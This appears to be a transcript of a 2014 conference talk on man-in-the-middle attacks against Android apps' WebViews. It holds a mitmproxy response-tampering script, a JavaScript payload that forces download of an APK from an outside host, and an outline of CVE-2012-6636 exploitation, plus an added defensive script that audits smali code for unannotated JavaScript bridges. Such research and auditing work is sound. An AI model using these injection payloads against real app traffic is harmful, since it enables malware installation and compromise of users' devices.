mitm attacks in android apps - tdc 2014
TRANSCRIPT
The Developer's Conference 2014
MITM Attacks on Android Apps
Abusing developers' trust
Ivan Joker Jeukens
Motivation
Many apps have built-in web browser capabilities: WebView, ChromeWebView, etc. classes
HTML, Javascript
Can we inject executable code in an app ?
Advantages: we have the client code!
Obfuscation is not really known/used by most developers
Messing with the server-app communication, not about grabbing cookies etc.
Usefulness: directed attacks
Lab setup & tools
Android SDK AVD Android 4.0.3 CPU/ABI Intel Atom
mitmproxy.org: Python scripts for manipulating requests and responses
code.google.com/p/android-apktool/: decompile into smali code
github.com/egirault/googleplay-api.git: API for interacting with the Google store (download apps from scripts)
MITM Script
    # mitmproxy inline script (2014-era inline-script API: response(ctx, flow)).
    # Decodes XML, JSON/JavaScript and HTML responses, lets the script edit them,
    # then re-encodes and restores the original Content-Encoding.
    import json
    from lxml import etree
    from bs4 import BeautifulSoup

    # Content-Type helpers used by the script; their bodies were not on the
    # slides, so the substring checks below are assumed.
    def isXml(ctype):
        return 'xml' in str(ctype)

    def isJson(ctype):
        return 'json' in str(ctype)

    def isJavascript(ctype):
        return 'javascript' in str(ctype)

    def isHtmlText(ctype):
        return 'text/html' in str(ctype)

    def response(ctx, flow):
        ctype = flow.response.headers['Content-Type']
        if flow.response.content is not None and isXml(ctype):
            etype = flow.response.headers['Content-Encoding']
            flow.response.decode()
            parser = etree.XMLParser(strip_cdata=False)
            root = etree.XML(flow.response.content, parser)
            ...  # edits to the parsed XML tree (elided on the slides)
            flow.response.content = etree.tostring(root, encoding='UTF-8')
            flow.response.headers['Content-Encoding'] = etype
            if 'gzip' in etype:
                flow.response.encode('gzip')
        elif flow.response.content is not None and (isJson(ctype) or isJavascript(ctype)):
            etype = flow.response.headers['Content-Encoding']
            flow.response.decode()
            jsondata = json.JSONDecoder(strict=False).decode(flow.response.content)
            ...  # edits to the decoded JSON (elided on the slides)
            flow.response.content = json.JSONEncoder().encode(jsondata)
            flow.response.headers['Content-Encoding'] = etype
            if 'gzip' in etype:
                flow.response.encode('gzip')
        elif flow.response.content is not None and isHtmlText(ctype):
            etype = flow.response.headers['Content-Encoding']
            flow.response.decode()
            htmldata = BeautifulSoup(flow.response.content)
            body = htmldata.body
            ...  # edits to the HTML body (elided on the slides)
            r = htmldata.prettify(formatter=None)
            flow.response.content = r.encode('ascii', 'ignore')
            flow.response.headers['Content-Encoding'] = etype
            if 'gzip' in etype:
                flow.response.encode('gzip')
Payload 1
Simple Social Engineering for malware distribution
Veja magazine news reader
Payload 1
    .class public Lcom/matera/veja/ui/StoryDetail;
    .method private createWebView()V
Payload 1
Some lame JavaScript
    payloadveja = '''
    function fase2() {
        var img = document.getElementById("chupacabra");
        img.src = "http://joker.com/vejadown.jpg";
    }
    function goDown() {
        var link = document.createElement("a");
        link.href = "http://joker.com/com.matera.veja.apk";
        if (document.createEvent) {
            var e = document.createEvent("MouseEvents");
            e.initEvent("click", true, true);
            link.dispatchEvent(e);
        }
        setTimeout(fase2, 3000);
    }
    '''
Payload 2
CVE-2012-6636 (03/02/2014): The Android API before 17 does not properly restrict the WebView.addJavascriptInterface() method
In theory, affects Android < 4.2. Versions 2.3.X don't work
Some 3.X also difficult
Adobe Reader
[screenshot fragment] /data/data/br.com.gabba.Caixa/pwnd.txt']);
    WebSettings webSettings = browser.getSettings();
    webSettings.setJavaScriptEnabled(true);
    browser.addJavascriptInterface(new JsInvokeClass(), "Android");
Payload 2
Android > 4.2: @JavascriptInterface annotation, per method
My statistics on this vuln (googleplay-api for downloading the apps): the googleplay-api script downloads the 100 most popular free apps for all categories.
2379 apps downloaded; 922 have addJavascriptInterface; 339 (14%) don't use @JavascriptInterface
Payload 2
    .class public Lbr/com/gabba/Caixa/CaixaWebViewActivity;
    .super Landroid/app/Activity;
    ...
    const-string v7, "Android"
    invoke-virtual {v5, v6, v7}, Landroid/webkit/WebView;->addJavascriptInterface(Ljava/lang/Object;Ljava/lang/String;)V
    const-string v7, "HTMLOUT"
    invoke-virtual {v5, v6, v7}, Landroid/webkit/WebView;->addJavascriptInterface(Ljava/lang/Object;Ljava/lang/String;)V
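The per-app check behind the statistics above, as an added example that is not the talk's script: it walks apktool/baksmali smali output (like the Caixa listing) for addJavascriptInterface calls and reports whether each bridge class carries the @JavascriptInterface annotation. The sample class names and smali are constructed, and resolving the bridge register through the nearest preceding new-instance is a simplifying assumption.

```python
import re
# Added example (not the talk's code): audit smali output for WebView JS bridges
# and report which bridge classes lack @JavascriptInterface. Unannotated bridges
# are reflection-reachable from page JS on API < 17 (CVE-2012-6636).
INVOKE_ADD_JSI = re.compile(r"invoke-virtual \{[vp]\d+, (?P<obj>[vp]\d+), [vp]\d+\}, "
                            r"Landroid/webkit/WebView;->addJavascriptInterface\(")
NEW_INSTANCE = re.compile(r"new-instance (?P<reg>[vp]\d+), (?P<type>L[\w/$]+;)")
METHOD_BLOCK = re.compile(r"\.method .*?\.end method", re.S)
JSI_ANNOTATION = ".annotation runtime Landroid/webkit/JavascriptInterface;"

def find_bridges(smali):
    """Bridge classes registered via addJavascriptInterface in one class. Heuristic
    (assumption): the object register resolves to the nearest preceding new-instance
    in the same method; a bridge passed as 'this' (p0) yields None."""
    found = []
    for block in METHOD_BLOCK.findall(smali):
        for call in INVOKE_ADD_JSI.finditer(block):
            obj = call.group("obj")
            types = [m.group("type") for m in NEW_INSTANCE.finditer(block[:call.start()])
                     if m.group("reg") == obj]
            found.append(types[-1] if types else None)
    return found

def audit(app):
    """app maps smali class name -> smali text. Returns {bridge_class: has_annotation}."""
    report = {}
    for smali in app.values():
        for bridge in find_bridges(smali):
            if bridge is not None:
                report[bridge] = JSI_ANNOTATION in app.get(bridge, "")
    return report

# Constructed sample smali (hypothetical classes, not from the talk's apps).
SAMPLE_APP = {
    "Lcom/example/HostActivity;": """.class public Lcom/example/HostActivity;
.method private createWebView()V
    new-instance v6, Lcom/example/LegacyBridge;
    const-string v7, "Android"
    invoke-virtual {v5, v6, v7}, Landroid/webkit/WebView;->addJavascriptInterface(Ljava/lang/Object;Ljava/lang/String;)V
    new-instance v6, Lcom/example/SafeBridge;
    const-string v7, "HTMLOUT"
    invoke-virtual {v5, v6, v7}, Landroid/webkit/WebView;->addJavascriptInterface(Ljava/lang/Object;Ljava/lang/String;)V
.end method""",
    "Lcom/example/LegacyBridge;": """.method public show(Ljava/lang/String;)V
    return-void
.end method""",
    "Lcom/example/SafeBridge;": """.method public show(Ljava/lang/String;)V
    .annotation runtime Landroid/webkit/JavascriptInterface;
    .end annotation
    return-void
.end method""",
}
```

Run audit() over the per-class smali files apktool emits for one APK; a False entry is a bridge whose every public method is exposed to injected JS on pre-17 devices.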
Payload 3
Simpler: instead of injecting code, just mess with the HTML links
Payload 3
Feasibility
These attacks require:
Setup MITM within wifi range: either a rogue AP, a public probe attack, or a vuln SOHO router
Some recon of your target apps
Catch the requests
Conclusions
Apps normally don't validate their data
HTTPS is the only solution used to prevent these attacks
Thanks for watching
ivanjokerbr.github.io
github.com/ivanjokerbr/
www.slideshare.net/ivanjokerbr